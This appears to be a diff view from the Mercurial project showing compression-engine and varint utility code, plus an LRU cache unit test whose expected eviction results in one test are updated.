3646 3656 # it is slow.
3647 3657 def wireprotosupport(self):
3648 3658 return compewireprotosupport('bzip2', 0, 0)
3649 3659
3650 3660 def compressstream(self, it, opts=None):
3651 3661 opts = opts or {}
3652 3662 z = bz2.BZ2Compressor(opts.get('level', 9))
3653 3663 for chunk in it:
3654 3664 data = z.compress(chunk)
3655 3665 if data:
3656 3666 yield data
3657 3667
3658 3668 yield z.flush()
3659 3669
3660 3670 def decompressorreader(self, fh):
3661 3671 return _BZ2CompressedStreamReader(fh)
3662 3672
3663 3673 compengines.register(_bz2engine())
3664 3674
3665 3675 class _truncatedbz2engine(compressionengine):
3666 3676 def name(self):
3667 3677 return 'bz2truncated'
3668 3678
3669 3679 def bundletype(self):
3670 3680 return None, '_truncatedBZ'
3671 3681
3672 3682 # We don't implement compressstream because it is hackily handled elsewhere.
3673 3683
3674 3684 def decompressorreader(self, fh):
3675 3685 return _TruncatedBZ2CompressedStreamReader(fh)
3676 3686
3677 3687 compengines.register(_truncatedbz2engine())
3678 3688
3679 3689 class _noopengine(compressionengine):
3680 3690 def name(self):
3681 3691 return 'none'
3682 3692
3683 3693 def bundletype(self):
3684 3694 """No compression is performed.
3685 3695
3686 3696 Use this compression engine to explicitly disable compression.
3687 3697 """
3688 3698 return 'none', 'UN'
3689 3699
3690 3700 # Clients always support uncompressed payloads. Servers don't because
3691 3701 # unless you are on a fast network, uncompressed payloads can easily
3692 3702 # saturate your network pipe.
3693 3703 def wireprotosupport(self):
3694 3704 return compewireprotosupport('none', 0, 10)
3695 3705
3696 3706 # We don't implement revlogheader because it is handled specially
3697 3707 # in the revlog class.
3698 3708
3699 3709 def compressstream(self, it, opts=None):
3700 3710 return it
3701 3711
3702 3712 def decompressorreader(self, fh):
3703 3713 return fh
3704 3714
3705 3715 class nooprevlogcompressor(object):
3706 3716 def compress(self, data):
3707 3717 return None
3708 3718
3709 3719 def revlogcompressor(self, opts=None):
3710 3720 return self.nooprevlogcompressor()
3711 3721
3712 3722 compengines.register(_noopengine())
3713 3723
3714 3724 class _zstdengine(compressionengine):
3715 3725 def name(self):
3716 3726 return 'zstd'
3717 3727
3718 3728 @propertycache
3719 3729 def _module(self):
3720 3730 # Not all installs have the zstd module available. So defer importing
3721 3731 # until first access.
3722 3732 try:
3723 3733 from . import zstd
3724 3734 # Force delayed import.
3725 3735 zstd.__version__
3726 3736 return zstd
3727 3737 except ImportError:
3728 3738 return None
3729 3739
3730 3740 def available(self):
3731 3741 return bool(self._module)
3732 3742
3733 3743 def bundletype(self):
3734 3744 """A modern compression algorithm that is fast and highly flexible.
3735 3745
3736 3746 Only supported by Mercurial 4.1 and newer clients.
3737 3747
3738 3748 With the default settings, zstd compression is both faster and yields
3739 3749 better compression than ``gzip``. It also frequently yields better
3740 3750 compression than ``bzip2`` while operating at much higher speeds.
3741 3751
3742 3752 If this engine is available and backwards compatibility is not a
3743 3753 concern, it is likely the best available engine.
3744 3754 """
3745 3755 return 'zstd', 'ZS'
3746 3756
3747 3757 def wireprotosupport(self):
3748 3758 return compewireprotosupport('zstd', 50, 50)
3749 3759
3750 3760 def revlogheader(self):
3751 3761 return '\x28'
3752 3762
3753 3763 def compressstream(self, it, opts=None):
3754 3764 opts = opts or {}
3755 3765 # zstd level 3 is almost always significantly faster than zlib
3756 3766 # while providing no worse compression. It strikes a good balance
3757 3767 # between speed and compression.
3758 3768 level = opts.get('level', 3)
3759 3769
3760 3770 zstd = self._module
3761 3771 z = zstd.ZstdCompressor(level=level).compressobj()
3762 3772 for chunk in it:
3763 3773 data = z.compress(chunk)
3764 3774 if data:
3765 3775 yield data
3766 3776
3767 3777 yield z.flush()
3768 3778
3769 3779 def decompressorreader(self, fh):
3770 3780 return _ZstdCompressedStreamReader(fh, self._module)
3771 3781
3772 3782 class zstdrevlogcompressor(object):
3773 3783 def __init__(self, zstd, level=3):
3774 3784 # TODO consider omitting frame magic to save 4 bytes.
3775 3785 # This writes content sizes into the frame header. That is
3776 3786 # extra storage. But it allows a correct size memory allocation
3777 3787 # to hold the result.
3778 3788 self._cctx = zstd.ZstdCompressor(level=level)
3779 3789 self._dctx = zstd.ZstdDecompressor()
3780 3790 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3781 3791 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3782 3792
3783 3793 def compress(self, data):
3784 3794 insize = len(data)
3785 3795 # Caller handles empty input case.
3786 3796 assert insize > 0
3787 3797
3788 3798 if insize < 50:
3789 3799 return None
3790 3800
3791 3801 elif insize <= 1000000:
3792 3802 compressed = self._cctx.compress(data)
3793 3803 if len(compressed) < insize:
3794 3804 return compressed
3795 3805 return None
3796 3806 else:
3797 3807 z = self._cctx.compressobj()
3798 3808 chunks = []
3799 3809 pos = 0
3800 3810 while pos < insize:
3801 3811 pos2 = pos + self._compinsize
3802 3812 chunk = z.compress(data[pos:pos2])
3803 3813 if chunk:
3804 3814 chunks.append(chunk)
3805 3815 pos = pos2
3806 3816 chunks.append(z.flush())
3807 3817
3808 3818 if sum(map(len, chunks)) < insize:
3809 3819 return ''.join(chunks)
3810 3820 return None
3811 3821
3812 3822 def decompress(self, data):
3813 3823 insize = len(data)
3814 3824
3815 3825 try:
3816 3826 # This was measured to be faster than other streaming
3817 3827 # decompressors.
3818 3828 dobj = self._dctx.decompressobj()
3819 3829 chunks = []
3820 3830 pos = 0
3821 3831 while pos < insize:
3822 3832 pos2 = pos + self._decompinsize
3823 3833 chunk = dobj.decompress(data[pos:pos2])
3824 3834 if chunk:
3825 3835 chunks.append(chunk)
3826 3836 pos = pos2
3827 3837 # Frame should be exhausted, so no finish() API.
3828 3838
3829 3839 return ''.join(chunks)
3830 3840 except Exception as e:
3831 3841 raise error.RevlogError(_('revlog decompress error: %s') %
3832 3842 stringutil.forcebytestr(e))
3833 3843
3834 3844 def revlogcompressor(self, opts=None):
3835 3845 opts = opts or {}
3836 3846 return self.zstdrevlogcompressor(self._module,
3837 3847 level=opts.get('level', 3))
3838 3848
3839 3849 compengines.register(_zstdengine())
3840 3850
3841 3851 def bundlecompressiontopics():
3842 3852 """Obtains a list of available bundle compressions for use in help."""
3843 3853 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3844 3854 items = {}
3845 3855
3846 3856 # We need to format the docstring. So use a dummy object/type to hold it
3847 3857 # rather than mutating the original.
3848 3858 class docobject(object):
3849 3859 pass
3850 3860
3851 3861 for name in compengines:
3852 3862 engine = compengines[name]
3853 3863
3854 3864 if not engine.available():
3855 3865 continue
3856 3866
3857 3867 bt = engine.bundletype()
3858 3868 if not bt or not bt[0]:
3859 3869 continue
3860 3870
3861 3871 doc = pycompat.sysstr('``%s``\n %s') % (
3862 3872 bt[0], engine.bundletype.__doc__)
3863 3873
3864 3874 value = docobject()
3865 3875 value.__doc__ = doc
3866 3876 value._origdoc = engine.bundletype.__doc__
3867 3877 value._origfunc = engine.bundletype
3868 3878
3869 3879 items[bt[0]] = value
3870 3880
3871 3881 return items
3872 3882
3873 3883 i18nfunctions = bundlecompressiontopics().values()
3874 3884
3875 3885 # convenient shortcut
3876 3886 dst = debugstacktrace
3877 3887
3878 3888 def safename(f, tag, ctx, others=None):
3879 3889 """
3880 3890 Generate a name that it is safe to rename f to in the given context.
3881 3891
3882 3892 f: filename to rename
3883 3893 tag: a string tag that will be included in the new name
3884 3894 ctx: a context, in which the new name must not exist
3885 3895 others: a set of other filenames that the new name must not be in
3886 3896
3887 3897 Returns a file name of the form oldname~tag[~number] which does not exist
3888 3898 in the provided context and is not in the set of other names.
3889 3899 """
3890 3900 if others is None:
3891 3901 others = set()
3892 3902
3893 3903 fn = '%s~%s' % (f, tag)
3894 3904 if fn not in ctx and fn not in others:
3895 3905 return fn
3896 3906 for n in itertools.count(1):
3897 3907 fn = '%s~%s~%s' % (f, tag, n)
3898 3908 if fn not in ctx and fn not in others:
3899 3909 return fn
3900 3910
3901 3911 def readexactly(stream, n):
3902 3912 '''read n bytes from stream.read and abort if less was available'''
3903 3913 s = stream.read(n)
3904 3914 if len(s) < n:
3905 3915 raise error.Abort(_("stream ended unexpectedly"
3906 3916 " (got %d bytes, expected %d)")
3907 3917 % (len(s), n))
3908 3918 return s
3909 3919
3910 3920 def uvarintencode(value):
3911 3921 """Encode an unsigned integer value to a varint.
3912 3922
3913 3923 A varint is a variable length integer of 1 or more bytes. Each byte
3914 3924 except the last has the most significant bit set. The lower 7 bits of
3915 3925 each byte store the 2's complement representation, least significant group
3916 3926 first.
3917 3927
3918 3928 >>> uvarintencode(0)
3919 3929 '\\x00'
3920 3930 >>> uvarintencode(1)
3921 3931 '\\x01'
3922 3932 >>> uvarintencode(127)
3923 3933 '\\x7f'
3924 3934 >>> uvarintencode(1337)
3925 3935 '\\xb9\\n'
3926 3936 >>> uvarintencode(65536)
3927 3937 '\\x80\\x80\\x04'
3928 3938 >>> uvarintencode(-1)
3929 3939 Traceback (most recent call last):
3930 3940 ...
3931 3941 ProgrammingError: negative value for uvarint: -1
3932 3942 """
3933 3943 if value < 0:
3934 3944 raise error.ProgrammingError('negative value for uvarint: %d'
3935 3945 % value)
3936 3946 bits = value & 0x7f
3937 3947 value >>= 7
3938 3948 bytes = []
3939 3949 while value:
3940 3950 bytes.append(pycompat.bytechr(0x80 | bits))
3941 3951 bits = value & 0x7f
3942 3952 value >>= 7
3943 3953 bytes.append(pycompat.bytechr(bits))
3944 3954
3945 3955 return ''.join(bytes)
3946 3956
3947 3957 def uvarintdecodestream(fh):
3948 3958 """Decode an unsigned variable length integer from a stream.
3949 3959
3950 3960 The passed argument is anything that has a ``.read(N)`` method.
3951 3961
3952 3962 >>> try:
3953 3963 ... from StringIO import StringIO as BytesIO
3954 3964 ... except ImportError:
3955 3965 ... from io import BytesIO
3956 3966 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3957 3967 0
3958 3968 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3959 3969 1
3960 3970 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3961 3971 127
3962 3972 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3963 3973 1337
3964 3974 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3965 3975 65536
3966 3976 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3967 3977 Traceback (most recent call last):
3968 3978 ...
3969 3979 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3970 3980 """
3971 3981 result = 0
3972 3982 shift = 0
3973 3983 while True:
3974 3984 byte = ord(readexactly(fh, 1))
3975 3985 result |= ((byte & 0x7f) << shift)
3976 3986 if not (byte & 0x80):
3977 3987 return result
3978 3988 shift += 7
@@ -1,325 +1,325 b''
1 1 from __future__ import absolute_import, print_function
2 2
3 3 import unittest
4 4
5 5 import silenttestrunner
6 6
7 7 from mercurial import (
8 8 util,
9 9 )
10 10
11 11 class testlrucachedict(unittest.TestCase):
12 12 def testsimple(self):
13 13 d = util.lrucachedict(4)
14 14 self.assertEqual(d.capacity, 4)
15 15 d.insert('a', 'va', cost=2)
16 16 d['b'] = 'vb'
17 17 d['c'] = 'vc'
18 18 d.insert('d', 'vd', cost=42)
19 19
20 20 self.assertEqual(d['a'], 'va')
21 21 self.assertEqual(d['b'], 'vb')
22 22 self.assertEqual(d['c'], 'vc')
23 23 self.assertEqual(d['d'], 'vd')
24 24
25 25 self.assertEqual(d.totalcost, 44)
26 26
27 27 # 'a' should be dropped because it was least recently used.
28 28 d['e'] = 've'
29 29 self.assertNotIn('a', d)
30 30 self.assertIsNone(d.get('a'))
31 31 self.assertEqual(d.totalcost, 42)
32 32
33 33 self.assertEqual(d['b'], 'vb')
34 34 self.assertEqual(d['c'], 'vc')
35 35 self.assertEqual(d['d'], 'vd')
36 36 self.assertEqual(d['e'], 've')
37 37
38 38 # Replacing item with different cost adjusts totalcost.
39 39 d.insert('e', 've', cost=4)
40 40 self.assertEqual(d.totalcost, 46)
41 41
42 42 # Touch entries in some order (both get and set).
43 43 d['e']
44 44 d['c'] = 'vc2'
45 45 d['d']
46 46 d['b'] = 'vb2'
47 47
48 48 # 'e' should be dropped now
49 49 d['f'] = 'vf'
50 50 self.assertNotIn('e', d)
51 51 self.assertEqual(d['b'], 'vb2')
52 52 self.assertEqual(d['c'], 'vc2')
53 53 self.assertEqual(d['d'], 'vd')
54 54 self.assertEqual(d['f'], 'vf')
55 55
56 56 d.clear()
57 57 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
58 58 self.assertNotIn(key, d)
59 59
60 60 def testunfull(self):
61 61 d = util.lrucachedict(4)
62 62 d['a'] = 1
63 63 d['b'] = 2
64 64 d['a']
65 65 d['b']
66 66
67 67 for key in ('a', 'b'):
68 68 self.assertIn(key, d)
69 69
70 70 def testcopypartial(self):
71 71 d = util.lrucachedict(4)
72 72 d.insert('a', 'va', cost=4)
73 73 d.insert('b', 'vb', cost=2)
74 74
75 75 dc = d.copy()
76 76
77 77 self.assertEqual(len(dc), 2)
78 78 self.assertEqual(dc.totalcost, 6)
79 79 for key in ('a', 'b'):
80 80 self.assertIn(key, dc)
81 81 self.assertEqual(dc[key], 'v%s' % key)
82 82
83 83 self.assertEqual(len(d), 2)
84 84 for key in ('a', 'b'):
85 85 self.assertIn(key, d)
86 86 self.assertEqual(d[key], 'v%s' % key)
87 87
88 88 d['c'] = 'vc'
89 89 del d['b']
90 90 self.assertEqual(d.totalcost, 4)
91 91 dc = d.copy()
92 92 self.assertEqual(len(dc), 2)
93 93 self.assertEqual(dc.totalcost, 4)
94 94 for key in ('a', 'c'):
95 95 self.assertIn(key, dc)
96 96 self.assertEqual(dc[key], 'v%s' % key)
97 97
98 98 def testcopyempty(self):
99 99 d = util.lrucachedict(4)
100 100 dc = d.copy()
101 101 self.assertEqual(len(dc), 0)
102 102
103 103 def testcopyfull(self):
104 104 d = util.lrucachedict(4)
105 105 d.insert('a', 'va', cost=42)
106 106 d['b'] = 'vb'
107 107 d['c'] = 'vc'
108 108 d['d'] = 'vd'
109 109
110 110 dc = d.copy()
111 111
112 112 for key in ('a', 'b', 'c', 'd'):
113 113 self.assertIn(key, dc)
114 114 self.assertEqual(dc[key], 'v%s' % key)
115 115
116 116 self.assertEqual(d.totalcost, 42)
117 117 self.assertEqual(dc.totalcost, 42)
118 118
119 119 # 'a' should be dropped because it was least recently used.
120 120 dc['e'] = 've'
121 121 self.assertNotIn('a', dc)
122 122 for key in ('b', 'c', 'd', 'e'):
123 123 self.assertIn(key, dc)
124 124 self.assertEqual(dc[key], 'v%s' % key)
125 125
126 126 self.assertEqual(d.totalcost, 42)
127 127 self.assertEqual(dc.totalcost, 0)
128 128
129 129 # Contents and order of original dict should remain unchanged.
130 130 dc['b'] = 'vb_new'
131 131
132 132 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
133 133 for key in ('a', 'b', 'c', 'd'):
134 134 self.assertEqual(d[key], 'v%s' % key)
135 135
136 136 d = util.lrucachedict(4, maxcost=42)
137 137 d.insert('a', 'va', cost=5)
138 138 d.insert('b', 'vb', cost=4)
139 139 d.insert('c', 'vc', cost=3)
140 140 dc = d.copy()
141 141 self.assertEqual(dc.maxcost, 42)
142 142 self.assertEqual(len(dc), 3)
143 143
144 144 # Max cost can be lowered as part of copy.
145 145 dc = d.copy(maxcost=10)
146 146 self.assertEqual(dc.maxcost, 10)
147 147 self.assertEqual(len(dc), 2)
148 148 self.assertEqual(dc.totalcost, 7)
149 149 self.assertIn('b', dc)
150 150 self.assertIn('c', dc)
151 151
152 152 def testcopydecreasecapacity(self):
153 153 d = util.lrucachedict(5)
154 154 d.insert('a', 'va', cost=4)
155 155 d.insert('b', 'vb', cost=2)
156 156 d['c'] = 'vc'
157 157 d['d'] = 'vd'
158 158
159 159 dc = d.copy(2)
160 160 self.assertEqual(dc.totalcost, 0)
161 161 for key in ('a', 'b'):
162 162 self.assertNotIn(key, dc)
163 163 for key in ('c', 'd'):
164 164 self.assertIn(key, dc)
165 165 self.assertEqual(dc[key], 'v%s' % key)
166 166
167 167 dc.insert('e', 've', cost=7)
168 168 self.assertEqual(dc.totalcost, 7)
169 169 self.assertNotIn('c', dc)
170 170 for key in ('d', 'e'):
171 171 self.assertIn(key, dc)
172 172 self.assertEqual(dc[key], 'v%s' % key)
173 173
174 174 # Original should remain unchanged.
175 175 self.assertEqual(d.totalcost, 6)
176 176 for key in ('a', 'b', 'c', 'd'):
177 177 self.assertIn(key, d)
178 178 self.assertEqual(d[key], 'v%s' % key)
179 179
180 180 def testcopyincreasecapacity(self):
181 181 d = util.lrucachedict(5)
182 182 d['a'] = 'va'
183 183 d['b'] = 'vb'
184 184 d['c'] = 'vc'
185 185 d['d'] = 'vd'
186 186
187 187 dc = d.copy(6)
188 188 for key in ('a', 'b', 'c', 'd'):
189 189 self.assertIn(key, dc)
190 190 self.assertEqual(dc[key], 'v%s' % key)
191 191
192 192 dc['e'] = 've'
193 193 dc['f'] = 'vf'
194 194 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
195 195 self.assertIn(key, dc)
196 196 self.assertEqual(dc[key], 'v%s' % key)
197 197
198 198 dc['g'] = 'vg'
199 199 self.assertNotIn('a', dc)
200 200 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
201 201 self.assertIn(key, dc)
202 202 self.assertEqual(dc[key], 'v%s' % key)
203 203
204 204 # Original should remain unchanged.
205 205 for key in ('a', 'b', 'c', 'd'):
206 206 self.assertIn(key, d)
207 207 self.assertEqual(d[key], 'v%s' % key)
208 208
209 209 def testpopoldest(self):
210 210 d = util.lrucachedict(4)
211 211 d.insert('a', 'va', cost=10)
212 212 d.insert('b', 'vb', cost=5)
213 213
214 214 self.assertEqual(len(d), 2)
215 215 self.assertEqual(d.popoldest(), ('a', 'va'))
216 216 self.assertEqual(len(d), 1)
217 217 self.assertEqual(d.totalcost, 5)
218 218 self.assertEqual(d.popoldest(), ('b', 'vb'))
219 219 self.assertEqual(len(d), 0)
220 220 self.assertEqual(d.totalcost, 0)
221 221 self.assertIsNone(d.popoldest())
222 222
223 223 d['a'] = 'va'
224 224 d['b'] = 'vb'
225 225 d['c'] = 'vc'
226 226 d['d'] = 'vd'
227 227
228 228 self.assertEqual(d.popoldest(), ('a', 'va'))
229 229 self.assertEqual(len(d), 3)
230 230 for key in ('b', 'c', 'd'):
231 231 self.assertEqual(d[key], 'v%s' % key)
232 232
233 233 d['a'] = 'va'
234 234 self.assertEqual(d.popoldest(), ('b', 'vb'))
235 235
236 236 def testmaxcost(self):
237 237 # Item cost is zero by default.
238 238 d = util.lrucachedict(6, maxcost=10)
239 239 d['a'] = 'va'
240 240 d['b'] = 'vb'
241 241 d['c'] = 'vc'
242 242 d['d'] = 'vd'
243 243 self.assertEqual(len(d), 4)
244 244 self.assertEqual(d.totalcost, 0)
245 245
246 246 d.clear()
247 247
248 248 # Insertion to exact cost threshold works without eviction.
249 249 d.insert('a', 'va', cost=6)
250 250 d.insert('b', 'vb', cost=4)
251 251
252 252 self.assertEqual(len(d), 2)
253 253 self.assertEqual(d['a'], 'va')
254 254 self.assertEqual(d['b'], 'vb')
255 255
256 256 # Inserting a new element with 0 cost works.
257 257 d['c'] = 'vc'
258 258 self.assertEqual(len(d), 3)
259 259
260 260 # Inserting a new element with cost putting us above high
261 261 # water mark evicts oldest single item.
262 262 d.insert('d', 'vd', cost=1)
263 263 self.assertEqual(len(d), 3)
264 264 self.assertEqual(d.totalcost, 5)
265 265 self.assertNotIn('a', d)
266 266 for key in ('b', 'c', 'd'):
267 267 self.assertEqual(d[key], 'v%s' % key)
268 268
269 269 # Inserting a new element with enough room for just itself
270 270 # evicts all items before.
271 271 d.insert('e', 've', cost=10)
272 272 self.assertEqual(len(d), 1)
273 273 self.assertEqual(d.totalcost, 10)
274 274 self.assertIn('e', d)
275 275
276 276 # Inserting a new element with cost greater than threshold
277 277 # still retains that item.
278 278 d.insert('f', 'vf', cost=11)
279 279 self.assertEqual(len(d), 1)
280 280 self.assertEqual(d.totalcost, 11)
281 281 self.assertIn('f', d)
282 282
283 283 # Inserting a new element will evict the last item since it is
284 284 # too large.
285 285 d['g'] = 'vg'
286 286 self.assertEqual(len(d), 1)
287 287 self.assertEqual(d.totalcost, 0)
288 288 self.assertIn('g', d)
289 289
290 290 d.clear()
291 291
292 292 d.insert('a', 'va', cost=7)
293 293 d.insert('b', 'vb', cost=3)
294 294 self.assertEqual(len(d), 2)
295 295
296 296 # Replacing a value with smaller cost won't result in eviction.
297 297 d.insert('b', 'vb2', cost=2)
298 298 self.assertEqual(len(d), 2)
299 299
300 300 # Replacing a value with a higher cost will evict when threshold
301 301 # exceeded.
302 302 d.insert('b', 'vb3', cost=4)
303 303 self.assertEqual(len(d), 1)
304 304 self.assertNotIn('a', d)
305 305
306 306 def testmaxcostcomplex(self):
307 307 d = util.lrucachedict(100, maxcost=100)
308 308 d.insert('a', 'va', cost=9)
309 309 d.insert('b', 'vb', cost=21)
310 310 d.insert('c', 'vc', cost=7)
311 311 d.insert('d', 'vc', cost=50)
312 312 self.assertEqual(d.totalcost, 87)
313 313
314 314 # Inserting new element should free multiple elements so we hit
315 315 # low water mark.
316 316 d.insert('e', 'vd', cost=25)
317 self.assertEqual(len(d), 3)
317 self.assertEqual(len(d), 2)
318 318 self.assertNotIn('a', d)
319 319 self.assertNotIn('b', d)
320 self.assertIn('c', d)
320 self.assertNotIn('c', d)
321 321 self.assertIn('d', d)
322 322 self.assertIn('e', d)
323 323
324 324 if __name__ == '__main__':
325 325 silenttestrunner.main(__name__)
General Comments 0
You need to be logged in to leave comments. Login now